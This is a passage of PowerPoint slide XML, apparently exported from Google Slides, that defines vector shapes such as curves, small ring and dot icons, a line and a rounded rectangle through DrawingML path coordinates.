                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="1"/>
                    <a:pt x="1" y="138"/>
                    <a:pt x="1" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="457"/>
                    <a:pt x="115" y="571"/>
                    <a:pt x="274" y="571"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3470" y="571"/>
                    <a:pt x="4976" y="1827"/>
                    <a:pt x="6414" y="3036"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7830" y="4223"/>
                    <a:pt x="9290" y="5456"/>
                    <a:pt x="12235" y="5456"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12395" y="5456"/>
                    <a:pt x="12509" y="5342"/>
                    <a:pt x="12509" y="5182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12509" y="5022"/>
                    <a:pt x="12395" y="4885"/>
                    <a:pt x="12235" y="4885"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9496" y="4885"/>
                    <a:pt x="8172" y="3790"/>
                    <a:pt x="6780" y="2603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5273" y="1325"/>
                    <a:pt x="3698" y="1"/>
                    <a:pt x="274"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24" name="Google Shape;1392;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E5A559D-666B-E6AC-9A7F-8FA89E6EC826}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8421068" y="1939203"/>
              <a:ext cx="42787" cy="42767"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2170" h="2169" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1074" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="0"/>
                    <a:pt x="1" y="503"/>
                    <a:pt x="1" y="1096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1689"/>
                    <a:pt x="480" y="2169"/>
                    <a:pt x="1074" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="2169"/>
                    <a:pt x="2169" y="1689"/>
                    <a:pt x="2169" y="1096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="503"/>
                    <a:pt x="1667" y="0"/>
                    <a:pt x="1074"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25" name="Google Shape;1393;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D45B3C4A-B0D8-B933-7BDA-03D1574C9917}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8415231" y="1933801"/>
              <a:ext cx="54026" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2740" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1370" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1826" y="571"/>
                    <a:pt x="2169" y="914"/>
                    <a:pt x="2169" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="1804"/>
                    <a:pt x="1826" y="2169"/>
                    <a:pt x="1370" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="936" y="2169"/>
                    <a:pt x="571" y="1804"/>
                    <a:pt x="571" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="914"/>
                    <a:pt x="936" y="571"/>
                    <a:pt x="1370" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1370" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="0"/>
                    <a:pt x="0" y="617"/>
                    <a:pt x="0" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2123"/>
                    <a:pt x="616" y="2740"/>
                    <a:pt x="1370" y="2740"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="2740"/>
                    <a:pt x="2739" y="2123"/>
                    <a:pt x="2739" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2739" y="617"/>
                    <a:pt x="2123" y="0"/>
                    <a:pt x="1370"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26" name="Google Shape;1394;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD650F64-E7E4-0ED5-CF11-2506638BC634}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8142932" y="1842884"/>
              <a:ext cx="42333" cy="42787"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2147" h="2170" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1074" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="1"/>
                    <a:pt x="1" y="503"/>
                    <a:pt x="1" y="1096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1690"/>
                    <a:pt x="480" y="2169"/>
                    <a:pt x="1074" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="2169"/>
                    <a:pt x="2146" y="1690"/>
                    <a:pt x="2146" y="1096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2146" y="503"/>
                    <a:pt x="1667" y="1"/>
                    <a:pt x="1074"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27" name="Google Shape;1395;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE735145-6196-541C-B42B-19D4420A7A16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8137096" y="1837481"/>
              <a:ext cx="54026" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2740" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1370" y="572"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1803" y="572"/>
                    <a:pt x="2169" y="914"/>
                    <a:pt x="2169" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="1804"/>
                    <a:pt x="1803" y="2169"/>
                    <a:pt x="1370" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="936" y="2169"/>
                    <a:pt x="571" y="1804"/>
                    <a:pt x="571" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="914"/>
                    <a:pt x="936" y="572"/>
                    <a:pt x="1370" y="572"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1370" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="1"/>
                    <a:pt x="0" y="617"/>
                    <a:pt x="0" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2124"/>
                    <a:pt x="616" y="2740"/>
                    <a:pt x="1370" y="2740"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="2740"/>
                    <a:pt x="2739" y="2124"/>
                    <a:pt x="2739" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2739" y="617"/>
                    <a:pt x="2123" y="1"/>
                    <a:pt x="1370"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28" name="Google Shape;1396;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D66CCECF-368E-651B-1134-27FF74E7C893}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8421068" y="2071528"/>
              <a:ext cx="42787" cy="42767"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2170" h="2169" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1074" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="0"/>
                    <a:pt x="1" y="479"/>
                    <a:pt x="1" y="1073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1666"/>
                    <a:pt x="480" y="2168"/>
                    <a:pt x="1074" y="2168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="2168"/>
                    <a:pt x="2169" y="1666"/>
                    <a:pt x="2169" y="1073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="479"/>
                    <a:pt x="1667" y="0"/>
                    <a:pt x="1074"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29" name="Google Shape;1397;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A90C984-DDBB-65D7-DF35-D12D1A46CD89}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8415231" y="2065671"/>
              <a:ext cx="54026" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2740" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1370" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1826" y="571"/>
                    <a:pt x="2169" y="936"/>
                    <a:pt x="2169" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="1803"/>
                    <a:pt x="1826" y="2169"/>
                    <a:pt x="1370" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="936" y="2169"/>
                    <a:pt x="571" y="1803"/>
                    <a:pt x="571" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="936"/>
                    <a:pt x="936" y="571"/>
                    <a:pt x="1370" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1370" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="0"/>
                    <a:pt x="0" y="617"/>
                    <a:pt x="0" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2123"/>
                    <a:pt x="616" y="2739"/>
                    <a:pt x="1370" y="2739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="2739"/>
                    <a:pt x="2739" y="2123"/>
                    <a:pt x="2739" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2739" y="617"/>
                    <a:pt x="2123" y="0"/>
                    <a:pt x="1370"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30" name="Google Shape;1398;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED2F4570-1E7B-0B64-D402-90D5D9427C7D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8142932" y="2071528"/>
              <a:ext cx="42333" cy="42767"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2147" h="2169" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1074" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="0"/>
                    <a:pt x="1" y="479"/>
                    <a:pt x="1" y="1073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1666"/>
                    <a:pt x="480" y="2168"/>
                    <a:pt x="1074" y="2168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="2168"/>
                    <a:pt x="2146" y="1666"/>
                    <a:pt x="2146" y="1073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2146" y="479"/>
                    <a:pt x="1667" y="0"/>
                    <a:pt x="1074"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31" name="Google Shape;1399;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7765AF52-D16E-D2C1-225A-E7A5C29D2A03}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8137096" y="2065671"/>
              <a:ext cx="54026" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2740" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1370" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1803" y="571"/>
                    <a:pt x="2169" y="936"/>
                    <a:pt x="2169" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="1803"/>
                    <a:pt x="1803" y="2169"/>
                    <a:pt x="1370" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="936" y="2169"/>
                    <a:pt x="571" y="1803"/>
                    <a:pt x="571" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="936"/>
                    <a:pt x="936" y="571"/>
                    <a:pt x="1370" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1370" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="0"/>
                    <a:pt x="0" y="617"/>
                    <a:pt x="0" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2123"/>
                    <a:pt x="616" y="2739"/>
                    <a:pt x="1370" y="2739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="2739"/>
                    <a:pt x="2739" y="2123"/>
                    <a:pt x="2739" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2739" y="617"/>
                    <a:pt x="2123" y="0"/>
                    <a:pt x="1370"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32" name="Google Shape;1400;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AD5EC28-CAF5-118C-9824-40B590E0D2F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8179844" y="2087262"/>
              <a:ext cx="246646" cy="11278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12509" h="572" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="274" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="1"/>
                    <a:pt x="1" y="115"/>
                    <a:pt x="1" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="435"/>
                    <a:pt x="115" y="572"/>
                    <a:pt x="274" y="572"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12235" y="572"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12395" y="572"/>
                    <a:pt x="12509" y="435"/>
                    <a:pt x="12509" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12509" y="115"/>
                    <a:pt x="12395" y="1"/>
                    <a:pt x="12235"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33" name="Google Shape;1401;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE5F02A-0436-C4FE-3CED-BCB7864AD8AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8179844" y="2219133"/>
              <a:ext cx="246646" cy="107579"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12509" h="5456" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12235" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9290" y="1"/>
                    <a:pt x="7830" y="1233"/>
                    <a:pt x="6414" y="2420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4976" y="3630"/>
                    <a:pt x="3470" y="4885"/>
                    <a:pt x="274" y="4885"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="4885"/>
                    <a:pt x="1" y="5022"/>
                    <a:pt x="1" y="5182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5342"/>
                    <a:pt x="115" y="5456"/>
                    <a:pt x="274" y="5456"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3698" y="5456"/>
                    <a:pt x="5273" y="4132"/>
                    <a:pt x="6780" y="2854"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8172" y="1690"/>
                    <a:pt x="9496" y="571"/>
                    <a:pt x="12235" y="571"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12395" y="571"/>
                    <a:pt x="12509" y="457"/>
                    <a:pt x="12509" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12509" y="138"/>
                    <a:pt x="12395" y="1"/>
                    <a:pt x="12235"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34" name="Google Shape;1402;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09EF3D6D-B4CC-C968-FE6B-9F6A13B57D19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8421068" y="2203378"/>
              <a:ext cx="42787" cy="42787"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2170" h="2170" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1074" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="1"/>
                    <a:pt x="1" y="503"/>
                    <a:pt x="1" y="1096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1690"/>
                    <a:pt x="480" y="2169"/>
                    <a:pt x="1074" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="2169"/>
                    <a:pt x="2169" y="1690"/>
                    <a:pt x="2169" y="1096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="503"/>
                    <a:pt x="1667" y="1"/>
                    <a:pt x="1074"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35" name="Google Shape;1403;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96DD1883-F742-044B-CC2B-97CEDB7C665C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8415231" y="2197976"/>
              <a:ext cx="54026" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2740" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1370" y="572"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1826" y="572"/>
                    <a:pt x="2169" y="937"/>
                    <a:pt x="2169" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="1804"/>
                    <a:pt x="1826" y="2169"/>
                    <a:pt x="1370" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="936" y="2169"/>
                    <a:pt x="571" y="1804"/>
                    <a:pt x="571" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="937"/>
                    <a:pt x="936" y="572"/>
                    <a:pt x="1370" y="572"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1370" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="1"/>
                    <a:pt x="0" y="617"/>
                    <a:pt x="0" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2124"/>
                    <a:pt x="616" y="2740"/>
                    <a:pt x="1370" y="2740"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="2740"/>
                    <a:pt x="2739" y="2124"/>
                    <a:pt x="2739" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2739" y="617"/>
                    <a:pt x="2123" y="1"/>
                    <a:pt x="1370"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36" name="Google Shape;1404;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C7C8BF-6AFE-EAC2-92A4-D088491A76F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8142932" y="2299698"/>
              <a:ext cx="42333" cy="42767"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2147" h="2169" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1074" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="0"/>
                    <a:pt x="1" y="503"/>
                    <a:pt x="1" y="1096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1689"/>
                    <a:pt x="480" y="2169"/>
                    <a:pt x="1074" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="2169"/>
                    <a:pt x="2146" y="1689"/>
                    <a:pt x="2146" y="1096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2146" y="503"/>
                    <a:pt x="1667" y="0"/>
                    <a:pt x="1074"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37" name="Google Shape;1405;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F533E5-ADD4-B0D9-288C-95F24A09E279}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8137096" y="2294296"/>
              <a:ext cx="54026" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2740" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1370" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1803" y="571"/>
                    <a:pt x="2169" y="936"/>
                    <a:pt x="2169" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="1804"/>
                    <a:pt x="1803" y="2169"/>
                    <a:pt x="1370" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="936" y="2169"/>
                    <a:pt x="571" y="1804"/>
                    <a:pt x="571" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="936"/>
                    <a:pt x="936" y="571"/>
                    <a:pt x="1370" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1370" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="1"/>
                    <a:pt x="0" y="617"/>
                    <a:pt x="0" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2123"/>
                    <a:pt x="616" y="2740"/>
                    <a:pt x="1370" y="2740"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="2740"/>
                    <a:pt x="2739" y="2123"/>
                    <a:pt x="2739" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2739" y="617"/>
                    <a:pt x="2123" y="1"/>
                    <a:pt x="1370"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38" name="Google Shape;1406;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C8DC10-E0B3-E82D-5973-1843C9D55E4C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6075826" y="3424838"/>
              <a:ext cx="945139" cy="512182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="47934" h="25976" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2739" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1233" y="1"/>
                    <a:pt x="0" y="1210"/>
                    <a:pt x="0" y="2740"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="23237"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="24743"/>
                    <a:pt x="1233" y="25976"/>
                    <a:pt x="2739" y="25976"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45194" y="25976"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46701" y="25976"/>
                    <a:pt x="47933" y="24743"/>
                    <a:pt x="47933" y="23237"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="47933" y="2740"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="47933" y="1210"/>
                    <a:pt x="46701" y="1"/>
                    <a:pt x="45194" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="2970AA">
                <a:alpha val="3482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39" name="Google Shape;1407;p52">
